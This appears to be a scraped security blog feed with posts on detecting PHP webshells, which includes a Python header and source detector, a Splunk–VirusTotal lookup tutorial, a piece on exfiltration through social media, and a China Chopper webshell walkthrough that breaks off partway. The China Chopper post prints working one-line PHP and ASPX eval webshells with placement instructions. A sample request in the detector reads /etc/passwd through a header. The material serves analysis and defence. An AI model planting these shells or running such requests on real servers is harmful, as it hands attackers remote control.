<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Using Google Rapid Response (GRR) you can launch a hunt on your web servers (or all servers, for that matter) for files containing 'passthru' and '<?php'. Of course, prevention is much easier than detection.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">With <a href="http://www.ossec.net/" target="_blank">OSSEC</a> file integrity monitoring you will have a file-based method of detection, depending on the site content and structure. Since most people exclude temp directories from file integrity monitoring, it's the best place to put a webshell ;)</span><br />
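As an added example (not code from the post), here is the detection logic the Bro/Splunk header alerting and the GRR file hunt above describe, in Python: a check that an Accept-Language header actually parses as a list of language ranges, run over constructed sample requests, plus a source-side check for PHP that hands request data straight to passthru() and friends. The length threshold and the sample requests are assumptions made for the example.

```python
import re
from typing import Dict, List

# Accept-Language is a comma-separated list of language ranges (BCP 47 style
# tags such as "en-US", or "*"), each optionally followed by ";q=0.5".
# A shell command such as "cat /etc/passwd" cannot match this grammar.
_LANGUAGE_RANGE = re.compile(
    r"^(?:\*|[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*)"
    r"(?:\s*;\s*[Qq]\s*=\s*(?:0(?:\.\d{1,3})?|1(?:\.0{1,3})?))?$"
)

# Header length above which we alert regardless of content; the value is an
# assumption for this example, tune it to the browsers you actually see.
MAX_ACCEPT_LANGUAGE_LEN = 120

# Constructed sample requests (not captured traffic): a normal browser request
# and one carrying the command from the post in its Accept-Language header.
SAMPLE_BROWSER_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: 192.168.110.114\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "\r\n"
)
SAMPLE_WEBSHELL_REQUEST = (
    "GET /webshells/48bytes.php HTTP/1.1\r\n"
    "Host: 192.168.110.114\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\r\n"
    "Accept-Language: cat /etc/passwd\r\n"
    "\r\n"
)


def accept_language_is_plausible(value: str) -> bool:
    """True when every comma-separated element is a language range."""
    ranges = [r.strip() for r in value.split(",") if r.strip()]
    return bool(ranges) and all(_LANGUAGE_RANGE.match(r) for r in ranges)


def parse_request_headers(raw_request: str) -> Dict[str, str]:
    """Map lower-cased header names to values for one raw HTTP request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers.setdefault(name.strip().lower(), value.strip())
    return headers


def suspicious_headers(raw_request: str) -> List[str]:
    """Reasons the request's Accept-Language header should raise an alert."""
    value = parse_request_headers(raw_request).get("accept-language")
    if value is None:
        return []
    reasons = []
    if not accept_language_is_plausible(value):
        reasons.append("accept-language is not a language-range list: %r" % value)
    if len(value) > MAX_ACCEPT_LANGUAGE_LEN:
        reasons.append("accept-language is %d bytes long" % len(value))
    return reasons


# Source-side check in the spirit of the GRR hunt for 'passthru' and '<?php':
# flag PHP that hands request-derived data straight to a command runner.
_EXEC_FUNCS = ("passthru", "exec", "shell_exec", "system", "popen", "proc_open")
_REQUEST_SOURCE = r"(?:getenv\s*\(|\$_(?:SERVER|GET|POST|REQUEST|COOKIE)\b)"
_EXEC_FROM_REQUEST = re.compile(
    r"\b(" + "|".join(_EXEC_FUNCS) + r")\s*\(\s*" + _REQUEST_SOURCE, re.IGNORECASE
)


def webshell_indicators(php_source: str) -> List[str]:
    """Command-execution functions that are fed directly from request data."""
    if "<?php" not in php_source and "<?=" not in php_source:
        return []
    return sorted({m.group(1).lower() for m in _EXEC_FROM_REQUEST.finditer(php_source)})


if __name__ == "__main__":
    for label, req in (("browser", SAMPLE_BROWSER_REQUEST),
                       ("webshell", SAMPLE_WEBSHELL_REQUEST)):
        print(label, suspicious_headers(req) or "no findings")
    print(webshell_indicators('<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"))?>'))
```

The header check only works where the header values are actually collected (Bro with header logging enabled, or a proxy tap), which is the gap the post points out.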
<h4>
<span style="font-family: Arial, Helvetica, sans-serif;">Prevention</span></h4>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">If you have a public facing server without <a href="http://grsecurity.net/" target="_blank">grsecurity</a>, yer gonna have a bad time. In my opinion grsec with a well-defined policy is the first place to start. Well, maybe the first place to start is having the admins disable exec(), passthru() and system()! Good luck with that :)</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>Unknown noreply@blogger.com
tag:blogger.com,1999:blog-2139855789243746740.post-7548567863067580320 2013-05-27T07:49:00.000-07:00 2013-05-29T07:56:49.155-07:00
Splunking Virustotal PoC<div class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif;">Doing malware analysis and research on a frequent basis, I'm all about trying to make life easier and getting information faster. <a href="http://www.bro.org/" target="_blank">Bro</a>, <a href="http://www.splunk.com/" target="_blank">Splunk</a> and <a href="http://virustotal.com/en/search/" target="_blank">Virustotal</a> are tools that I'm constantly interfacing with. I thought it would be awesome if I could use Virustotal's API to search md5s gathered from Bro logs in Splunk. These three tools provide an amazing amount of useful information; with their powers combined I hoped it would make life a bit easier and help me connect the dots faster.</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<h2>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">Requirements</span></h2>
<span style="font-family: Arial, Helvetica, sans-serif;">To test this concept I'm using CentOS and the limited version of Splunk. Beyond that you will also need:</span><br />
<br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://virustotal.com/" target="_blank">Register</a> with Virustotal to get an API key.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Python Development libraries</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Install Splunk and have a log source containing md5s (<a href="http://www.bro.org/" target="_blank">Bro</a>!)</span></li>
</ul>
<br />
<h3>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">Splunk Configuration</span></h3>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">To get started we are going to create a generic Splunk app and copy over our python scripts. Next we configure the Splunk lookups and test it out.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Create a new Splunk App, choose "Manage apps..."</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-kqJEbz6L08A/UaLDJmDtIQI/AAAAAAAAE9I/j7lZiS3yFE4/s1600/Splunkappwindow.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="159" src="http://1.bp.blogspot.com/-kqJEbz6L08A/UaLDJmDtIQI/AAAAAAAAE9I/j7lZiS3yFE4/s320/Splunkappwindow.tiff" width="320" /></span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Click create app</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FdlbXZXXpmA/UaLDYTh_KiI/AAAAAAAAE9Q/CevSMSXnpdg/s1600/SplunkManagerApps.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="139" src="http://3.bp.blogspot.com/-FdlbXZXXpmA/UaLDYTh_KiI/AAAAAAAAE9Q/CevSMSXnpdg/s320/SplunkManagerApps.tiff" width="320" /></span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Add in the name, location of app and save.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Tj0fGMjT3Ks/UaLEvtm9EWI/AAAAAAAAE9g/rQsLNk4yfQU/s1600/addNew.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="320" src="http://1.bp.blogspot.com/-Tj0fGMjT3Ks/UaLEvtm9EWI/AAAAAAAAE9g/rQsLNk4yfQU/s320/addNew.tiff" width="200" /></span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Now would be a great time to import some logs containing md5s, or set up Bro and acquire them. You will want to extract the md5 field from your logs as well, or you can use rex on the fly.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span></div>
<div>
<h3>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">Python Scripts</span></h3>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Since Splunk's version of Python is bare bones, you'll need to create a wrapper that calls the actual script. Searching Splunk's site I found that someone had already created a script to do just this.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Save this to</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> /opt/splunk/etc/app/vtLookup/bin/wrapper.py</span></div>
<blockquote>
<pre>import os, sys

# Drop the environment Splunk's bundled Python sets, so the real script
# runs under the system interpreter and its own site-packages.
for envvar in ("PYTHONPATH", "LD_LIBRARY_PATH"):
    if envvar in os.environ:
        del os.environ[envvar]

python_executable = "/usr/bin/python"
real_script = "/opt/splunk/etc/apps/vtlookup/bin/vt.py"

# Replace this process with the system Python running the lookup script,
# forwarding the arguments Splunk passed to the wrapper.
os.execv(python_executable, [python_executable, real_script] + sys.argv[1:])</pre></blockquote>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Now we create the script that takes the md5 from Splunk and does a lookup using Virustotal's API.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Save this to <span style="font-size: x-small;">/opt/splunk/etc/app/vtLookup/bin/vtLookup.py</span>. Don't forget to enter your API key.</span><br />
<blockquote class="tr_bq">
<blockquote>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">import csv,sys,urllib,urllib2</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">def lookup(md5):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> try:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> response = urllib2.urlopen('https://www.virustotal.com/vtapi/v2/file/report', \</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> 'apikey=Enter in your API key here&resource=' + md5)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> lines = response.read()</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> return lines</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> except:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> return ''</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">def main():</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if len(sys.argv) != 3:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> print "python vt.py MD5 VT"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> sys.exit(0)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> md5f = sys.argv[1]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> vtf = sys.argv[2]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> r = csv.reader(sys.stdin)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> w = None</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> header = []</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> first = True</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> for line in r:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if first:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> header = line</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if vtf not in header or md5f not in header:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> print "missing vt or md5 field"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> sys.exit(0)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> csv.writer(sys.stdout).writerow(header)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> w = csv.DictWriter(sys.stdout, header)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> first = False</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> continue</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> result = {}</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> i = 0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> while i < len(header):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if i < len(line):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> result[header[i]] = line[i]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> else:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> result[header[i]] = ''</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> i += 1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if len(result[md5f]) and len(result[vtf]):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> w.writerow(result)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> elif len(result[md5f]):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> result[vtf] = lookup(result[md5f])</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if len(result[vtf]):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> w.writerow(result)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">main()</span><br />
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Next </span><span style="font-family: Arial, Helvetica, sans-serif;">we tell Splunk the location of the scripts and create a lookup.</span><span style="font-family: Arial, Helvetica, sans-serif;"> </span><span style="font-family: Arial, Helvetica, sans-serif;">In the Splunk manager select Lookups:</span></blockquote>
</blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-WJwRcOSwuAY/UaNlnM_hQvI/AAAAAAAAE94/-Jf1pWWmfkI/s1600/lookups.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="33" src="http://4.bp.blogspot.com/-WJwRcOSwuAY/UaNlnM_hQvI/AAAAAAAAE94/-Jf1pWWmfkI/s320/lookups.tiff" width="320" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Then Lookup definitions: </span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-PkSlzQ5KHA4/UaNlnJ61LRI/AAAAAAAAE9w/KCdR-T-R5EY/s1600/LookupDef.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="34" src="http://4.bp.blogspot.com/-PkSlzQ5KHA4/UaNlnJ61LRI/AAAAAAAAE9w/KCdR-T-R5EY/s320/LookupDef.tiff" width="320" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The 'Type' is external since we are calling an external script. The command is 'wrapper.py md5 vt', supported fields are md5, vt. Once you have that entered in, click Save.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-lY8Hx5L1yaI/UaNlnnTySoI/AAAAAAAAE-A/-jZbg6u4dsg/s1600/vtLookupConfig.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="240" src="http://4.bp.blogspot.com/-lY8Hx5L1yaI/UaNlnnTySoI/AAAAAAAAE-A/-jZbg6u4dsg/s640/vtLookupConfig.tiff" width="640" /></span></a></div>
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<br />
<h3>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">Splunking</span></h3>
<span style="font-family: Arial, Helvetica, sans-serif;">Now lets test it out and see if it works. The query to test was to call one known good md5 and pass it to the lookup script. The first part is specifing fields that are not "-" then send it to top and only give me one result back. The part we are concerned with is "lookup vtLookup md5".</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-HdyZGxRuykc/UaNpJqf0HMI/AAAAAAAAE-Y/x0rs9fszh_I/s1600/Splunking.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="http://4.bp.blogspot.com/-HdyZGxRuykc/UaNpJqf0HMI/AAAAAAAAE-Y/x0rs9fszh_I/s320/Splunking.tiff" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Running the search we see the new field "vt" with the response from Virustotal. Great! but I really want to search all time and find out some trends.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-1qQmJZpaFVQ/UaNqLLhDyZI/AAAAAAAAE-k/xmLj6V6Xxvo/s1600/Splunking2.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://2.bp.blogspot.com/-1qQmJZpaFVQ/UaNqLLhDyZI/AAAAAAAAE-k/xmLj6V6Xxvo/s640/Splunking2.tiff" width="640" /></a></div>
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="font-family: Arial, Helvetica, sans-serif;">When I bump of the search to return 10 responses we start seeing no response from Virustotal since our api call requests are limited. Boooo. </span><br />
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-S-S5g3o114w/UaNsKTukwPI/AAAAAAAAE-0/5OoqWY9WCP0/s1600/SplunkingTop10.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="http://3.bp.blogspot.com/-S-S5g3o114w/UaNsKTukwPI/AAAAAAAAE-0/5OoqWY9WCP0/s640/SplunkingTop10.tiff" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The limitations set by Virustotal doesn't make this very practical in Splunk. It was fun to try and maybe this will come in handy in the future.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span><span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;">Edit: Python scripts added to git repo </span></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">https://code.google.com/p/splunk-virustotal/</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-33865580033248787372012-11-24T15:29:00.001-08:002012-11-24T15:29:50.245-08:00Concealing Data Exfiltration with Youtube or Facebook<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">You've probably already read about <a href="http://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" target="_blank">Backdoor.Makadocs</a> which uses Google Docs or Google Drive as a command-and-control (C&C) server. This made quite a big stir last week, unfortunately this isn't a new trick. <a href="http://blog.eset.com/2012/06/21/acadmedre-10000s-of-autocad-files-leaked-in-suspected-industrial-espionage" target="_blank">ACAD/Medre.A</a> was created for the mass exfiltration of AutoCad files and used qq.com for transmitting files. I'm sure there are many other examples too.</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">The use of legitimate sites like Google Docs, Facebook and Youtube seem to be the obvious choice for hackers wanting to exfiltrate data. The benefit of course is the lack of IoC's from a network perspective. Could you tell the difference between someone watching a 30-minute clip or exfiltrating *.{doc,xls,dwg} files to Youtube or Facebook over SSL? There are <a href="http://keyj.emphy.de/files/tcsteg.py" target="_blank">already tools available</a> to hide TrueCrypt volumes in mp4's. Why not use Youtube or Facebook to exfiltrate data? I haven't read any incidents involving this but it's coming.</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-RSYRM2btVoE/ULFTtQNCaYI/AAAAAAAAEVo/8fBOBtTVHxY/s1600/udoob.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif; font-size: x-small;"></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2HCyArz_g5M/ULFWRcPTNgI/AAAAAAAAEVw/h3X3RjmSpaY/s1600/udoob.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="http://1.bp.blogspot.com/-2HCyArz_g5M/ULFWRcPTNgI/AAAAAAAAEVw/h3X3RjmSpaY/s400/udoob.tiff" width="400" /></a></div>
<br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">As companies improve there security to detected unwanted software the move to legitimate remote administration programs such as GoToMyPC, the natural path of evil doers would be to use those as well. Speaking of which, did you know you can control who uses GoToMyPC from your corporate IP space?</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<table border="0" cellpadding="0" cellspacing="0" class="help_pro_n_faq_qnas" style="background-color: white; font-family: arial; font-size: 12px; width: 586px;"><tbody>
<tr><td class="help_pro_n_faq_q" style="font-weight: bold;"><blockquote class="tr_bq">
"Can I block the unofficial use of GoToMyPC Pro while allowing authorized use?</blockquote>
</td></tr>
<tr><td height="8"></td></tr>
<tr><td class="help_pro_n_faq_a"><blockquote>
Yes. Through our free Authorization Management Service (AMS), GoToMyPC Pro will gladly work with you to block selected Internet-visible IPs while still enabling authorized GoToMyPC Pro account access. If you do not currently have a GoToMyPC Pro account but wish to block access by using AMS, please contact<a href="mailto:gotopro@citrixonline.com">gotopro@citrixonline.com</a>. If you are a current GoToMyPC Pro customer, please contact us at<a href="mailto:gotoaccounts@citrixonline.com">gotoaccounts@citrixonline.com</a>."</blockquote>
If your company has a policy against using GoToMyPC (and no way to enforce it) you should probably work with Citrix to restrict access. If your company allows it, you should really restrict authorized accounts.<br />
<br />
Keith</td></tr>
</tbody></table>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-12835636081817741702012-11-16T15:00:00.000-08:002012-11-16T17:19:58.566-08:00China Chopper Webshell - the 4KB that Owns your Web Server<br />
<br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">I've been wanting to blog about China Chopper for sometime and finally got around to it. When I first started researching this webshell I was unable to find anything about how to set it up and configure it. In this post I'll go over the components of China Chopper as well as setting it up.</span><br />
<br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">China Chopper is a webshell used to remotely access Windows or Linux servers. It is malicious software used by the bad guys. Given the name China Chopper it is developed in China and used heavily by Chinese hackers.</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">The software is hosted on </span><span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;">maicaidao.com, which I might mention has recently changed.</span> </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-na8MgS7drFQ/UKayiwVEEiI/AAAAAAAAEUY/iDqJqQxafO4/s1600/maicaido.comWhois.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/-na8MgS7drFQ/UKayiwVEEiI/AAAAAAAAEUY/iDqJqQxafO4/s320/maicaido.comWhois.tiff" width="301" /></a></div>
<br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">The webshell consists mainly of two parts, the client interface (caidao.exe) and the file placed on the compromised web server. </span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Here are the files included with the download & MD5's.</span><br />
<span style="font-family: Verdana, sans-serif;"><b><br /></b></span>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;">caidao.exe 5001ef50c7e869253a7c152a638eab8a</span></span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><b>CCC</b></span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"></span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> aspRwWithJMail.ccc a6d6cbfa2ead1d0e8a6735aa49b963ff</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> aspSpy.ccc be207c46105c38571ae958ae2da47297</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> aspx.ccc cc07ac4caef188334fc330f62e0a574a</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> php.ccc 9100b18660f3a1eeca7ea801b357b8ce</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> phpSpy.ccc ce1a9fc93040d5c94f789b579fe1c106</span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="font-size: x-small;"><br /></span></b></span>
<span style="font-family: Verdana, sans-serif;"><b><span style="font-size: x-small;">Customize</span></b></span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> Customize.cfm ad8288227240477a95fb023551773c84</span><br />
<span style="font-size: x-small;"><span style="font-family: Verdana, sans-serif;"> Customize.jsp acba8115d027529763ea5c7ed6621499</span><span style="font-family: Verdana, sans-serif;"> </span><span style="font-family: Verdana, sans-serif;"> </span></span><br />
<br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">The file dropped on the compromised server is nice and small. The client, caidao.exe communicates directly with the file.</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"></span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Servers running IIS, place the contents below in a file called webshell.aspx</span><br />
<div style="text-align: center;">
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;"><%@ Page Language="Jscript"%><%eval(Request.Item[”password"],"unsafe");%></span></span></div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Servers running Apache with PHP, place the contents in a file call webshell.php</span><br />
<div style="text-align: center;">
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;"><?php @eval($_POST['password']);?></span></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Next, open caidao.exe</span></div>
<div class="separator" style="clear: both; text-align: center;">
